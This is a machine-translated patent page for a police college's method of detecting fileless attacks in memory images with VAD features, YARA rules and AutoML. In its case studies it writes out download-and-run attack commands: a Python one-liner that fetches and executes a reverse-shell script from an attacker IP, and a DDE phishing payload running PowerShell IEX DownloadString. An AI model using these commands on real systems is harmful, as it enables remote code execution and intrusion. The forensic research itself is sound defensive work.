CN117478373A - File-free attack investigation method and system based on memory evidence obtaining - Google Patents

File-free attack investigation method and system based on memory evidence obtaining Download PDF

Info

Publication number
CN117478373A
CN117478373A CN202311414040.6A CN202311414040A CN117478373A CN 117478373 A CN117478373 A CN 117478373A CN 202311414040 A CN202311414040 A CN 202311414040A CN 117478373 A CN117478373 A CN 117478373A
Authority
CN
China
Prior art keywords
sample
memory
attack
file
model
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202311414040.6A
Other languages
Chinese (zh)
Inventor
冷涛
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Sichuan Police College
Original Assignee
Sichuan Police College
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Sichuan Police College filed Critical Sichuan Police College
Priority to CN202311414040.6A priority Critical patent/CN117478373A/en
Publication of CN117478373A publication Critical patent/CN117478373A/en
Pending legal-status Critical Current

Links

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416Event detection, e.g. attack signature detection
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562Static detection
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L41/00Arrangements for maintenance, administration or management of data switching networks, e.g. of packet switching networks
    • H04L41/16Arrangements for maintenance, administration or management of data switching networks, e.g. of packet switching networks using machine learning or artificial intelligence
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441Countermeasures against malicious traffic
    • H04L63/145Countermeasures against malicious traffic the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441Countermeasures against malicious traffic
    • H04L63/1466Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/20Network architectures or network communication protocols for network security for managing network security; network security policies in general
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L9/00Cryptographic mechanisms or cryptographic arrangements for secret or secure communications; Network security protocols
    • H04L9/40Network security protocols
    • YGENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
    • Y02TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
    • Y02DCLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
    • Y02D10/00Energy efficient computing, e.g. low power processors, power management or thermal management

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computing Systems (AREA)
  • Software Systems (AREA)
  • General Health & Medical Sciences (AREA)
  • Virology (AREA)
  • Health & Medical Sciences (AREA)
  • Theoretical Computer Science (AREA)
  • Artificial Intelligence (AREA)
  • Computer Vision & Pattern Recognition (AREA)
  • Databases & Information Systems (AREA)
  • Evolutionary Computation (AREA)
  • Medical Informatics (AREA)
  • Physics & Mathematics (AREA)
  • General Physics & Mathematics (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The invention provides a file-free attack investigation method and system based on memory evidence obtaining, and belongs to the technical field of network security attack investigation. Firstly, respectively operating benign samples and implementing file-free attacks to obtain a memory mirror image; secondly, taking the virtual address descriptor node of each memory mirror image as a sample, and extracting the characteristics of a memory area corresponding to the sample; then, carrying out data processing on the sample to construct a data set; dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result; and finally, according to the test result, performing verification analysis on the tested malicious sample. The invention discovers the attack aiming at the specific memory area in the file-free attack, assists the attacker to investigate, effectively strengthens the security defense capability of the system, protects the key data from various threats of the file-free attack, and ensures the stability and the security of the system operation.

Description

File-free attack investigation method and system based on memory evidence obtaining
Technical Field
The invention belongs to the technical field of network security attack investigation, and particularly relates to a file-free attack investigation method and system based on memory evidence obtaining.
Background
While modern file-free malware utilizes various techniques to evade detection, researchers have been exploring memory forensics as a way to detect such attacks. The common method is that the existing plugins are used for evidence collection by utilizing a Volatity memory to extract the characteristics, and the characteristics are classified by utilizing a machine learning algorithm; another method is to convert the memory mirror image into a picture representation and detect it using deep learning techniques. However, these methods use the memory image as a sample to determine whether the host is destroyed, or use the process in the memory image as a sample to identify a malicious process. However, the granularity of detection is still relatively coarse and cannot be located in a specific memory area. Thus, to address these challenges, further research is needed to conduct fine-grained investigation against file-free attacks in order to identify malicious processes and pinpoint malicious virtual memory regions.
Disclosure of Invention
Based on the technical problems, the invention provides a file-free attack investigation method and a file-free attack investigation system based on memory evidence obtaining, which effectively help analysts to investigate file-free malicious software attacks by extracting features and accurately identifying and positioning suspicious memory areas.
The invention provides a file attack-free investigation method based on memory evidence obtaining, which comprises the following steps:
step S1: respectively running benign samples and implementing file-free attacks to obtain a memory mirror image; the file-free attack types comprise code injection, script attack and ground-leaving attack; the memory mirror comprises a malignant sample memory mirror and a benign sample memory mirror;
step S2: taking each virtual address descriptor node of the memory mirror image as a sample, and extracting the characteristics of a memory area corresponding to the sample;
step S3: performing de-duplication operation on the sample, and performing normalization operation on the numerical value of the sample at the same time to construct a data set;
step S4: dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result;
step S5: and according to the test result, performing verification analysis on the tested malicious sample.
Optionally, the running benign samples and implementing the file-free attack respectively obtain the memory mirror image specifically includes:
the file-free attack types comprise code injection, script attack and ground-leaving attack;
the code injection features comprise functions, binaries, codes, encryption information, countermeasures, memories, trojan horses and attack frameworks;
the script attack features comprise malicious character strings, neutral character strings and scripts, which are respectively used for detecting malicious command prompt script, neutral command prompt Fu Jiaoben and other malicious scripts;
the ground attack feature comprises a ground attack, a remote desktop protocol and a darknet communication protocol;
the memory mirror includes a malignant sample memory mirror and a benign sample memory mirror.
Optionally, taking the virtual address descriptor node of each memory mirror image as a sample, and extracting the feature of the memory area corresponding to the sample specifically includes:
acquiring a feature set of a memory area corresponding to the sample;
and setting an plugin based on the memory evidence obtaining frame, and extracting the characteristics of the characteristic set.
Optionally, the performing a deduplication operation on the sample, and simultaneously performing a normalization operation on the numerical value of the sample, so as to construct a data set, which specifically includes:
converting the sample into a set element, removing repeated items, and converting back to the original data type;
the normalization operation formula is:
wherein x is Label (C) For the result processed by Min-Max normalized conversion function, x is the data of the sample, x max X is the maximum value of the sample data min Is the minimum of the sample data.
Optionally, the dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result, which specifically includes:
dividing the data set into a training set and a testing set, and randomly distributing the samples;
model training is carried out on the training set by using an automatic machine learning library, evaluation indexes of different models are compared according to output results, and a model with highest precision on the training set is selected as an optimal model;
applying an optimal model to the test set for testing to obtain the prediction output of the optimal model, and calculating the evaluation index of the optimal model in the test set;
judging whether the optimal model reaches an expected target according to the evaluation index on the test set, and if not, adjusting parameters and re-training and testing; if satisfied, the model is deployed to the actual application.
The invention also provides a file-free attack investigation system based on memory evidence obtaining, which comprises:
the memory mirror image acquisition module is used for respectively running benign samples and implementing file-free attacks to obtain memory mirror images; the file-free attack types comprise code injection, script attack and ground-leaving attack; the memory mirror comprises a malignant sample memory mirror and a benign sample memory mirror;
the feature extraction module is used for taking the virtual address descriptor node of each memory mirror image as a sample and extracting the features of the memory area corresponding to the sample;
the data processing module is used for carrying out the de-duplication operation on the sample and carrying out the normalization operation on the numerical value of the sample at the same time to construct a data set;
the automatic machine learning module is used for dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result;
and the verification analysis module is used for carrying out verification analysis on the tested malicious sample according to the test result.
Optionally, the memory mirror image acquisition module specifically includes:
the file-free attack types comprise code injection, script attack and ground-leaving attack;
the code injection features comprise functions, binaries, codes, encryption information, countermeasures, memories, trojan horses and attack frameworks;
the script attack features comprise malicious character strings, neutral character strings and scripts, which are respectively used for detecting malicious command prompt script, neutral command prompt Fu Jiaoben and other malicious scripts;
the ground attack comprises a ground attack, a remote desktop protocol and a darknet communication protocol;
the memory mirror includes a malignant sample memory mirror and a benign sample memory mirror.
Optionally, the feature extraction module specifically includes:
the feature set acquisition sub-module is used for acquiring a feature set of a memory area corresponding to the sample;
and the feature extraction sub-module is used for setting a plug-in based on the memory evidence obtaining frame and extracting the features of the feature set.
Optionally, the data processing module specifically includes:
the deduplication operation submodule is used for converting the sample into a set element, deduplicating repeated items and converting back to the original data type;
the normalization operation formula is:
wherein x is Label (C) For the result processed by Min-Max normalized conversion function, x is the data of the sample, x max X is the maximum value of the sample data min Is the minimum of the sample data.
Optionally, the automatic machine learning module specifically includes:
a data set dividing submodule for dividing the data set into a training set and a testing set and randomly distributing the samples;
the model training sub-module is used for carrying out model training on the training set by using an automatic machine learning library, comparing evaluation indexes of different models according to output results, and selecting a model with highest precision on the training set as an optimal model;
the model test sub-module is used for applying an optimal model to the test set to test to obtain the prediction output of the optimal model, and calculating the evaluation index of the optimal model in the test set;
the model judging sub-module is used for judging whether the optimal model reaches an expected target according to the evaluation index on the test set, and if not, adjusting parameters and retraining and testing; if satisfied, the model is deployed to the actual application.
Compared with the prior art, the invention has the following beneficial effects:
the invention injects the covering process, based on script attack, the file-free attack investigation system combined with ground leaving attack, and the value detected by the method is improved to a certain extent than that of the method which only aims at the internal storage injection; the memory descriptor (memory area) is taken as a sample, the sample contains a specified memory area of a specific process, a malicious memory area is automatically identified, an attack investigator can be guided to further deeply analyze the content of the memory area by using memory evidence obtaining, and the workload of an analyst is reduced; the custom plug-in based on the volatibility memory evidence obtaining tool is realized, and the extraction of the memory mirror image characteristics is realized; meanwhile, various types of file-free attacks are realized, and a memory mirror image data set is constructed.
Drawings
FIG. 1 is a flow chart of a file-free attack investigation method based on memory evidence obtaining in the invention;
FIG. 2 is a block diagram of a file-free attack investigation system based on memory evidence obtaining according to the present invention;
FIG. 3 is a Python-based file-less attack survey of the present invention;
FIG. 4 is a schematic diagram of an attack order according to the present invention;
FIG. 5 is a diagram of malicious script content according to the present invention.
Detailed Description
The invention is further described below in connection with specific embodiments and the accompanying drawings, but the invention is not limited to these embodiments.
Example 1
As shown in fig. 1, the invention discloses a file-attack-free investigation method based on memory evidence obtaining, which comprises the following steps:
step S1: respectively running benign samples and implementing file-free attacks to obtain a memory mirror image; the file-free attack types comprise code injection, script attack and ground-leaving attack; the memory mirror includes a malignant sample memory mirror and a benign sample memory mirror.
Step S2: and taking the virtual address descriptor node of each memory mirror image as a sample, and extracting the characteristics of the memory area corresponding to the sample.
Step S3: and carrying out de-duplication operation on the sample, and carrying out normalization operation on the numerical value of the sample at the same time to construct a data set.
Step S4: dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result.
Step S5: and according to the test result, performing verification analysis on the tested malicious sample.
The steps are discussed in detail below:
step S1: and respectively running benign samples and implementing file-free attacks to obtain the memory mirror image.
The step S1 specifically comprises the following steps:
the detection Code injection features include API (function), binary, code, cryptograph, counter measure, memory, trojan, and detection against existing attack frameworks metaplus and Cobalt Strike.
The malicious script attack characteristics are detected, and three different functions are designed: malicious strings, neutral strings, and scripts. For detecting malicious PowerShell scripts, neutral PowerShell scripts, and other types of malicious scripts. For malicious document attack vectors in a file-free attack, maldio (malicious document) features are developed, and yara rules are constructed to identify known CVE vulnerabilities and malicious VBA uses in a memory area.
Detection is based on the ground-free attack (lolins) feature, and yara rules were designed. These rules are used to detect whether Lolbins are present in the memory region; in addition, the vnc_dark function is designed. This function detects whether VNC (remote desktop protocol) and dark network protocol exist in the memory area.
The memory mirror image is acquired on the target system by respectively running benign samples and implementing file-free attacks, and any file monitoring or protection mechanism is not triggered; the memory mirror image is a file which stores all data and states in the system memory at a certain moment and can be used for analyzing the running condition of the system or recovering the state of the system.
Two types of memory mirror images are acquired: malignant sample memory mirror and benign sample memory mirror. A malicious sample memory image refers to a memory image of a system that is infected or affected by a file-free attack, which may contain traces of malicious code or abnormal behavior. Benign sample memory image refers to a memory image of a system that is not infected or affected by a file-free attack, which does not contain any traces of malicious code or abnormal behavior.
In this embodiment, the file-free attack types include code injection, script attack and ground attack; the memory mirror includes a malignant sample memory mirror and a benign sample memory mirror.
And referring to the behavior of a real attacker, simulating a file-free attack on a virtual machine, after the attack is completed, capturing a memory snapshot to obtain a memory mirror image of a malicious sample, referencing and executing the benign sample, and capturing the memory mirror image. Because the file attack triggering condition is not limited, the file attack triggering condition is manually executed, and the memory mirror image is collected under the connection state of the attack. Benign sample operation and memory mirror image acquisition are realized by adopting an automatic script.
Step S2: and taking the virtual address descriptor node of each memory mirror image as a sample, and extracting the characteristics of the memory area corresponding to the sample.
The step S2 specifically comprises the following steps:
a Virtual Address Descriptor (VAD) is a data structure that describes the attributes and state of each memory region in a process virtual address space. The VAD tree is a balanced binary tree used to store and manage all VAD nodes of the process. And traversing the VAD tree to obtain information of all memory areas of the process, including a start address, an end address, a protection attribute, a memory type, a memory state, a mapping file and the like. Taking each VAD node of each memory mirror image as a sample, extracting the characteristics of the corresponding memory area for subsequent machine learning analysis, wherein the extracted characteristics comprise the following steps:
basic features including the size of the memory region, protection attributes, memory type, memory state, etc., may reflect the basic attributes and uses of the memory region.
Content characteristics, including strings, binary data, API calls, sensitive information, etc. in the memory region may reflect specific content and functions in the memory region.
Behavior features, including code execution in the memory region, code injection, code modification, code obfuscation, etc., may reflect dynamic behavior and anomalies in the memory region.
The method for acquiring the feature set of the memory area corresponding to the sample specifically comprises the following steps:
the method comprises the steps of obtaining a memory feature set of a memory area, and specifically comprises eleven features of is_spark, protection, hbcia_structures, tag, mem_map, threads, private, network_structures, persistence, visual_structures and is_map, wherein the is_spark, protection, tag, mem_map, threads, private, is_map are obtained through statistical information or reading memory states, hbcia_structures, network_structures, visual_structures and persistence are obtained through constructing yara rule to scan the memory area.
The method comprises the steps of obtaining a function feature set of a memory area, wherein the function feature set comprises three features, namely api_general_string and api_dynamic_loading, and the api_mapping is realized by constructing a regular expression or utilizing yara rule matching.
The method comprises the steps of obtaining a binary feature set of a memory area, wherein the binary feature set comprises seven features, namely pe_or_dll, is_module, exports, has_header, is_dynamic_library, imports and width_header, and the feature design is judged and set by reading a specific field or mark.
The method comprises the steps of obtaining a code feature set of a memory area, wherein the code feature set comprises five features including direct_calls, direct_jmps, functions, shellcodes and hooks, the first two features are matched through a regular expression, and the last three features are matched through a yara rule.
The method comprises the steps of obtaining a countermeasure feature set of a memory area, wherein the countermeasure feature set comprises three features, namely a debug feature, a sadbox feature and a vm feature, and the three features are matched by adopting yara rules.
The method comprises the steps of obtaining an encryption information feature set of a memory area, wherein the encryption information feature set comprises three features of cipher, encoding and mapping, and the three features are matched by adopting yara rules.
The Trojan characteristic set of the memory area is obtained, specifically comprising two characteristics of cookies and crendials, and extraction is carried out by setting a yara rule.
The method comprises the steps of obtaining a file-free feature set of a memory area, wherein the file-free feature set comprises eight features, namely msf, cobalt, malstring, neutral, script, lobin, mal_doc and vnc_dark, and the eight features are matched by adopting yara rules.
In this embodiment, the memory mirroring is data collection of all processes of the host, where the host has multiple processes, and each process has multiple virtual address descriptors, where the virtual address descriptors are a section of memory area (start-stop address). By taking the virtual address descriptor as a sample, a certain memory area of a specific process can be located.
In this embodiment, the feature design of the memory area is shown in table 1, and the total of eight categories is forty-two features. The feature set includes a memory feature set, a function feature set, a binary feature set, a code feature set, an encryption information feature set, a countermeasure feature set, a wooden horse feature set, and a no-file feature set.
TABLE 1 characterization of memory regions
The plug-in is set based on the memory evidence obtaining frame, and the feature extraction method specifically comprises the following steps:
and writing a self-defined internal memory evidence obtaining plug-in by using a volatile internal memory evidence obtaining open-source tool, and extracting the characteristics of the characteristic set.
Step S3: and carrying out de-duplication operation on the sample, and carrying out normalization operation on the numerical value of the sample at the same time to construct a data set.
The step S3 specifically comprises the following steps:
the samples are converted into set elements, the repeated items are removed, and the original data types are returned.
In this embodiment, the set data structure is used to convert the samples into set elements, automatically remove duplicate entries, and then convert back to the original data type. The principle of this approach is to exploit the property of a collection that the elements in the collection are unordered and do not allow repetition. Thus, duplicate samples are automatically deleted when the samples are converted to collection elements. The collection is then converted back to the original data type. The method has the advantages of simplicity and easiness in use, and no extra space and time cost is required.
The normalization operation formula is:
wherein x is Label (C) To the result of Min-Max normalized conversion function, x is the data of the sample, x max X is the maximum value of the sample data min Is the minimum value of the sample data.
Step S4: dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result.
The step S4 specifically comprises the following steps:
the data set is divided into a training set and a test set, and samples are generally randomly allocated according to a certain proportion (e.g., 80% and 20%) to ensure the representativeness and independence of the training set and the test set.
Model training is performed on a training set by using an automatic machine learning library (AutoML), which is a method for automatically completing a machine learning process by using a machine learning technology and comprises the steps of data preprocessing, feature engineering, model selection, super-parameter optimization and the like. AutoML can save time and cost for manually debugging the model, and improve performance and interpretability of the model.
And selecting an optimal model (extremely random tree), comparing evaluation indexes (such as accuracy, recall, F1 score and the like) of different models according to the output result of the AutoML, and selecting the model with the best performance on a training set as the optimal model.
And (3) applying the optimal model to a test set for testing, using data of the test set as input to obtain prediction output of the model, comparing the prediction output with real labels of the test set, calculating an evaluation index of the model on the test set, and reflecting generalization capability and stability of the model.
And obtaining a test result, judging whether the model reaches an expected target according to an evaluation index on the test set, and if not, adjusting parameters or a data set of the AutoML to perform training and testing again. If satisfied, the model may be deployed into the actual application.
In this example, a study was conducted on a no file challenge with an AUC value of 98%, recall of 93%, prepison of 96.4% and F1 value of 94.7%.
Step S5: and according to the test result, performing verification analysis on the tested malicious sample.
The step S5 specifically comprises the following steps:
based on the test results, some malicious samples were determined. Further verification of these samples is required to confirm whether they contain malicious code, malicious behavior, or features related to known attack payloads; specialized security tools and memory forensics may be used to analyze the content and structure of the sample.
When Volatility is used, the file path of the memory image and the version of the operating system need to be specified in order to correctly identify the memory structure. For example, if the memory image file is memory. Img and the operating system is Windows10, the following commands can be used:
volatility-fmemory.img--profile=Win10x64
and (3) performing memory evidence obtaining, namely performing deep analysis and examination on the malicious memory sample by using a memory evidence obtaining technology. By extracting key information in the memory, such as processes, threads, registries, network connections, etc., the behavior and activity of malicious samples in the system can be known, and the possible attack loads of the malicious samples can be identified.
By using these plug-ins, verification analysis can be performed on malicious memory samples, such as:
whether an abnormal or hidden process is running or not can be checked through a pslist or psscan plug-in, and the process ID and the name of the abnormal or hidden process are recorded; whether an abnormal or unknown network connection or socket exists or not can be checked through the netscan plug-in, and relevant processes and remote addresses of the network connection or socket are recorded; whether an abnormal or suspicious command line parameter or a dynamic link library exists or not can be checked through a cmdline or dllllist plug-in, and the path or the content of the command line parameter or the dynamic link library is recorded; through a malfind or apihooks plugin, whether malicious code is injected or API hooks exist or not can be checked, and the malicious code is dumped into a file for disassembly or decompilation analysis; through a hivelist or printkey plug-in, whether an abnormal or modified registry key exists or not can be checked, and key values or data of the registry key are recorded; through the hashdump plug-in, whether the user account password hash value is stolen or cracked or not can be checked, and the plaintext password is attempted to be recovered. The Virtual Address Descriptor (VAD) content of a process may be dumped into a file by vadump. The vaddyump plug-in may be used to extract data that is not mapped to a memory region of a file, such as a heap, stack, or injected code.
And identifying and coping the threat, identifying the security threat existing in the system according to the result of verification analysis, and formulating a corresponding security coping strategy. This may include measures to fix system vulnerabilities, update security policies, enhance network monitoring, etc., to enhance the security defenses of the system and reduce future security risks.
Example 2
As shown in fig. 2, the present invention discloses a file-attack-free investigation system based on memory evidence obtaining, the system comprises:
the memory mirror image acquisition module 10 is used for respectively running benign samples and implementing file-free attacks to obtain a memory mirror image; the file-free attack types comprise code injection, script attack and ground-leaving attack; the memory mirror includes a malignant sample memory mirror and a benign sample memory mirror.
The feature extraction module 20 is configured to take the virtual address descriptor node of each memory image as a sample, and extract features of a memory area corresponding to the sample.
The data processing module 30 is configured to perform a deduplication operation on the sample, and perform a normalization operation on the numerical value of the sample, so as to construct a data set.
The automatic machine learning module 40 is configured to divide the data set into a training set and a testing set, perform model training on the training set using the automatic machine learning library, select an optimal model, and apply the optimal model to the data set for testing, so as to obtain a test result.
The verification analysis module 50 is configured to perform verification analysis on the tested malicious sample according to the test result.
As an alternative embodiment, the memory mirror image acquisition module 10 of the present invention specifically includes:
the file-free attack types include code injection, script attack, and ground-free attack.
Code injection features include functions, binaries, codes, encryption information, countermeasures, memory, trojan, and attack frameworks.
The script attack feature includes a malicious string, a neutral string, and a script for detecting a malicious command prompt script, a neutral command prompt Fu Jiaoben, and other malicious scripts, respectively.
The ground attack feature includes a ground attack, a remote desktop protocol and a darknet communication protocol.
The memory mirror includes a malignant sample memory mirror and a benign sample memory mirror.
As an alternative embodiment, the feature extraction module 20 of the present invention specifically includes:
the feature set acquisition sub-module is used for acquiring the feature set of the memory area corresponding to the sample.
And the feature extraction sub-module is used for setting a plug-in based on the memory evidence obtaining frame and extracting the features of the feature set.
As an alternative embodiment, the data processing module 30 of the present invention specifically includes:
and the deduplication operation submodule is used for converting the sample into a set element, deduplicating the duplicate item and converting back to the original data type.
The normalization operation formula is:
wherein x is Label (C) To the result of Min-Max normalized conversion function, x is the data of the sample, x max X is the maximum value of the sample data min Is the minimum value of the sample data.
As an alternative embodiment, the automatic machine learning module 40 of the present invention specifically includes:
and the data set dividing submodule is used for dividing the data set into a training set and a testing set and randomly distributing samples.
And the model training sub-module is used for carrying out model training on the training set by using the automatic machine learning library, comparing the evaluation indexes of different models according to the output result, and selecting the model with the highest precision on the training set as the optimal model.
And the model test sub-module is used for applying the optimal model to the test set to test, obtaining the prediction output of the optimal model, and calculating the evaluation index of the optimal model in the test set.
The model judging sub-module is used for judging whether the optimal model reaches an expected target according to the evaluation index on the test set, and if not, adjusting parameters and re-training and testing; if satisfied, the model is deployed to the actual application.
Example 3
The present example was analyzed in combination with the experimental content as follows:
the attack process comprises the following steps: and constructing a website by using cobalstrike on an attacker (192.168.233.139) platform, deploying a shell. Py script, and starting a tcp rebound shell connection.
The target machine runs the following script: python-c "import ullib 2; exec ullib2. Ullepen ('http:// 192.168.233.139:8000/shell.py'). Read (); ".
And establishing a channel from the attacker to the target machine, and finishing the file-free attack. Capturing a system memory mirror image, and detecting a malicious process and a malicious memory area. As shown in fig. 3, each sample contains an "Address" field in the format imagename_processid_processname_vadstartaddress_vadand-Address, for example, a specific sample named 014.vmem_3488_python.exe_0x1480000_0x14bdfff is detected as a malicious sample. The case study involves a memory image named "014.Vmem" which is associated with a process ID named "3488" and a process name named "python. Exe". The memory region of interest corresponds to a virtual address descriptor, with a start address of "0x1480000" and a stop address of "0x14bdfff".
The Volatitudes plugin "vaddymp" is utilized to derive the specified memory region. Subsequently, using Neo to open the exported dmp file, the cobaltstrinke "beacon. Dll" (shown in fig. 3) was found, along with information about the functions associated with reverse code injection.
The present embodiment performs analysis in combination with cases, as follows:
generating a malicious powershell script x1.Ps1 on an attacker, starting reverse connection monitoring, constructing an office document, embedding a DDE command, and DDEAUTO C: windows/systems 32/cmd. Exe "/kpowershell IEX (New-objectnet. Webparent) & DownloadString ('http:// 192.168.233.146/file_shell/x 1. Ps1')"). And sending the malicious document to the target user through phishing mail.
The target user opens the phishing mail attachment on the target machine, allows dde to execute, establishes a connection channel between the attacker and the target machine, and realizes file-free attack. And capturing a memory mirror image, and detecting the following two samples as malicious by an application model.
Sample one: vmem 2280_powershell. Exe_0x1d30000_0x3d2ffff
Sample two: vmem 2280_powershell. Exe_0x1d30000_0x3d2ffff
The meaning of the two sample representation is 008 memory mirror, process powershell, process id 2280, malicious memory regions are 0x1d30000_0x3d2ffff and 0x1d30000_0x3d2ffff. The specified memory area is exported through vaddyump, as shown in fig. 4 and 5, attack command and malicious script content of x1.Ps1 are seen, and the accuracy and feasibility of the invention are proved through experimental verification and case analysis.
The above description is only of the preferred embodiments of the present invention and is not intended to limit the present invention, but various modifications and variations can be made to the present invention by those skilled in the art. Any modification, equivalent replacement, improvement, etc. made within the spirit and principle of the present invention should be included in the protection scope of the present invention.

Claims (10)

1. The file attack-free investigation method based on memory evidence obtaining is characterized by comprising the following steps:
step S1: respectively running benign samples and implementing file-free attacks to obtain a memory mirror image; the file-free attack types comprise code injection, script attack and ground-leaving attack; the memory mirror comprises a malignant sample memory mirror and a benign sample memory mirror;
step S2: taking each virtual address descriptor node of the memory mirror image as a sample, and extracting the characteristics of a memory area corresponding to the sample;
step S3: performing de-duplication operation on the sample, and performing normalization operation on the numerical value of the sample at the same time to construct a data set;
step S4: dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result;
step S5: and according to the test result, performing verification analysis on the tested malicious sample.
2. The method for investigating the file-free attack based on the memory evidence obtaining according to claim 1, wherein the method comprises the steps of respectively running benign samples and implementing the file-free attack to obtain the memory mirror image, and the method specifically comprises the following steps:
the file-free attack types comprise code injection, script attack and ground-leaving attack;
the code injection features comprise functions, binaries, codes, encryption information, countermeasures, memories, trojan horses and attack frameworks;
the script attack features comprise malicious character strings, neutral character strings and scripts, which are respectively used for detecting malicious command prompt script, neutral command prompt Fu Jiaoben and other malicious scripts;
the ground attack feature comprises a ground attack, a remote desktop protocol and a darknet communication protocol;
the memory mirror includes a malignant sample memory mirror and a benign sample memory mirror.
3. The method for investigating the file-free attack based on memory forensics according to claim 1, wherein the extracting the characteristics of the memory area corresponding to the sample by using the virtual address descriptor node of each memory mirror image as the sample specifically comprises:
acquiring a feature set of a memory area corresponding to the sample;
and setting an plugin based on the memory evidence obtaining frame, and extracting the characteristics of the characteristic set.
4. The method for investigating the file-free attack based on memory forensics according to claim 1, wherein the performing the deduplication operation on the sample and the normalization operation on the numerical value of the sample at the same time, and constructing a data set specifically comprises:
converting the sample into a set element, removing repeated items, and converting back to the original data type;
the normalization operation formula is:
wherein x is Label (C) For the result processed by Min-Max normalized conversion function, x is the data of the sample, x max X is the maximum value of the sample data min Is the minimum of the sample data.
5. The method for file-free attack investigation based on memory forensics according to claim 1, wherein the data set is divided into a training set and a test set, model training is performed on the training set by using an automatic machine learning library, an optimal model is selected, and the optimal model is applied to the data set for testing, so as to obtain a test result, and the method specifically comprises:
dividing the data set into a training set and a testing set, and randomly distributing the samples;
model training is carried out on the training set by using an automatic machine learning library, evaluation indexes of different models are compared according to output results, and a model with highest precision on the training set is selected as an optimal model;
applying an optimal model to the test set for testing to obtain the prediction output of the optimal model, and calculating the evaluation index of the optimal model in the test set;
judging whether the optimal model reaches an expected target according to the evaluation index on the test set, and if not, adjusting parameters and re-training and testing; if satisfied, the model is deployed to the actual application.
6. The file-free attack investigation system based on memory evidence obtaining is characterized in that the system comprises:
the memory mirror image acquisition module is used for respectively running benign samples and implementing file-free attacks to obtain memory mirror images; the file-free attack types comprise code injection, script attack and ground-leaving attack; the memory mirror comprises a malignant sample memory mirror and a benign sample memory mirror;
the feature extraction module is used for taking the virtual address descriptor node of each memory mirror image as a sample and extracting the features of the memory area corresponding to the sample;
the data processing module is used for carrying out the de-duplication operation on the sample and carrying out the normalization operation on the numerical value of the sample at the same time to construct a data set;
the automatic machine learning module is used for dividing the data set into a training set and a testing set, performing model training on the training set by using an automatic machine learning library, selecting an optimal model, and applying the optimal model to the data set for testing to obtain a testing result;
